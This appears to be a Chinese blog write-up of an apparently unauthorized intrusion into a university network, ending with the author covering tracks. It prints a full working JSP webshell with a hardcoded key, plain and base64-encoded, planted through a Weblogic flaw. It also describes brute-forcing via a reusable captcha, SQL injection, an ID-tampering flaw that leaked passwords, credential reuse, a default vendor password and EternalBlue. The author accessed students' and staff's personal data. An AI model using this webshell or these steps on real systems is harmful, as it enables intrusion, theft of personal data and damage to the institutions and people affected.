記一次某大學滲透過程
0x00 介紹
一次某大學的滲透過程,整體來看比較曲折,不過最后也打到內網了
整個過程是前幾個月記錄的,最近有空整理分享出來
0x01 信息收集
首先通過域名進入了官網
用fofa或nmap掃官網的IP,發現只開了80端口,簡單測了官網無漏洞
在官網某一個鏈接處跳轉到了某教育網IP(222開頭)
于是用老版fofa掃l了下這個教育網IP的端口,發現不少地方可以操作
(由于fofa不是實時數據所以又用nmap進行了確認)
大致來看有以下服務(接下來主要內容就是圍繞這些服務)
- 正方OA
- 強智
- 閉源學生管理系統
- 閉源人才培養系統
- 教師專用郵箱
- Weblogic
0x02 Weblogic初窺
其實看到18001端口開放大概就猜出了是Weblogic系統,等待fofa識別后果然
通過IIOP的CVE-2020-2551直接RCE
通過Base64編碼后echo一個冰蝎shell
echo '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' | base64
echo "PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KTt9JT4K" | base64 -D | > shell.jsp
成功getshell后通過冰蝎上傳了一個哥斯拉shell
接下來就是socks5代理了,上傳一個frp后發現服務端關了,事發突然并沒有做什么權限維持,到手的shell飛了
經過分析和思考,造成這種情況的原因是直接拿了編譯好的frp沒做免殺,也許內網有全流量,設備報警提醒了,管理員發現異常后直接關機了。坐等開機不是辦法,于是嘗試其他的系統
0x03 嘗試學生管理系統
通過0x01的信息收集,在這個機器上開著某閉源的學生管理系統,直覺告訴我這里有可能會有突破
首先來測弱口令,雖然沒有成功,但是發現了一些信息(后期會用到)
- 雖然有驗證碼但是可以復用
- 一個賬號爆破五次后會封禁半小時
- 登錄返回包沒有敏感信息
接下來就是對JS文件的審計
發現只有很少數量的JS文件,而且大都是JS庫,不存在隱藏接口一說
提取靜態文件指紋到fofa搜下看看有沒有相同網站,如果有相同網站可以通過弱口令進去,找到注入或者getshell后拿到源碼審計,這也是一種突破思路。然而搜不到,確定是閉源項目
爆破下隱藏JS或敏感文件,也沒有收獲
陷入了死胡同,沒有辦法,只能找其它系統嘗試
0x04 初窺正方OA
將目光轉移到正方OA
先拿一些已知的正方OA洞測試,由于版本等原因不能成功利用
于是想到正方OA的一個日志泄露:/log/年-月-日-log.txt或/log/年-月-日-Errorlog.txt
成功發現日志泄露,某用戶(18開頭手機號)做了刪除表操作,得到內網IP段10,大致猜測該用戶是老師或管理員
繼續審計日志,發現了一批用戶,不過這些用戶ID不再是手機號
得到這么多的用戶ID就可以造弱口令字典了
不過正方OA的驗證碼還是比較安全的,爆破起來很麻煩,于是想到之前的閉源學生管理系統
0x04 再探學生管理系統
利用在0x03中總結的規律:雖然有驗證碼但是可以復用
然后就可以用弱口令來爆了(經典123456)
成功登陸進去
但是發現該賬號權限特別小,只能查看一些學校的文件、發布文件等等
系統使用了ueditor1.3.6,有不少文章在這個版本下上傳成功,然而這里嘗試截斷傳馬失敗,有白名單
由于是.net系統,數據庫推斷使用的是sqlserver
于是嘗試找注入點,直接上sqlmap不妥,在后臺能傳參的地方打報錯注入payload
找到一處注入后利用xp_cmdshell提權但是失敗,無法getshell
繼續挖邏輯洞,嘗試找越權
發現了一處接口,通過修改請求參數中的用戶ID,可以遍歷出登錄賬號和密碼
通過爆破拿到賬號admin密碼8XXXXXX3
這是一個高權限賬號,可以拿下學校所有學生和教職工的信息,比如打卡信息和床位信息
通過這個高權限賬號可以拿到一批學生賬號密碼(通過注入和越權都可以拿)
有沒有可能其它系統也用這一套賬號密碼呢(很多人圖方便多套系統密碼一致)
0x05 滲透正方OA
通過以上收集到的賬號密碼,成功進入正方OA
拿下多個老師賬號權限,涉及到平時分、補考成績、選課、論文等
做了一些后續滲透沒有什么收獲
0x06 登錄專用郵箱
找到教師專用郵箱
繼續用這套密碼測
成功以某教師的身份進入,發現是QQ郵箱換皮(或者是封裝了一層)
這時其實可以做一些有意思的事情
比如你是信息部門的老師,可以發郵件給所有老師:最近學校內網流傳病毒,請下載該文件查殺
經過思考還是算了,不能亂來
0x07 登錄強智
回到最初信息收集拿到的強智
繼續用之前收集到的賬號密碼,成功登入
接下來可以看一些信息,做了一些后續滲透沒有什么收獲
0x08 滲透人才培養系統
用老辦法撞人才培養系統,發現這里并不是同一套密碼
提取指紋到fofa搜索一波,發現有接近1000個站點
針對于其中多個站用經典路子滲透(總有一個會出弱口令哈哈)
審JS沒問題,嘗試挖注入,所有可傳參點打報錯payload,感覺有戲就上sqlmap
成功找到一處注入點(sqlserver)
通過注入即可拿到管理員賬號密碼
嘗試用XP_CMDSHELL提權失敗,滲透之路艱難
0x09 再探Weblogic
再次打開之前拿到的Weblogic的哥斯拉shell
竟然開機了,這回要珍惜機會了
這回吸取經驗教訓,不搞frp了,用Neo-reGeorg代理,成功不被殺
0x0a 內網滲透
成功進到內網,稍微掃了下,發現一處華為虛擬化平臺,嘗試弱口令Admin-Huawei@CLOUD8!成功
接下來測試下17010,配置下msf的路由轉發,然后在內網中亂殺
試試弱口令(SSH,FTP,Redis等)基本一試一個準
內網的一些web系統,甚至admin-admin這種都可以直接進
0x0b 總結
最后沒有做太多的事情,關了socks隧道,刪掉了馬,清了msf sessions,一切就當沒發生過
之前和大佬做的一些滲透,技術含量不高,現在整理出來,不足之處,大佬們別噴就行
(后來我感覺自己太菜就去做Java安全了,大佬繼續在滲透領域深造)
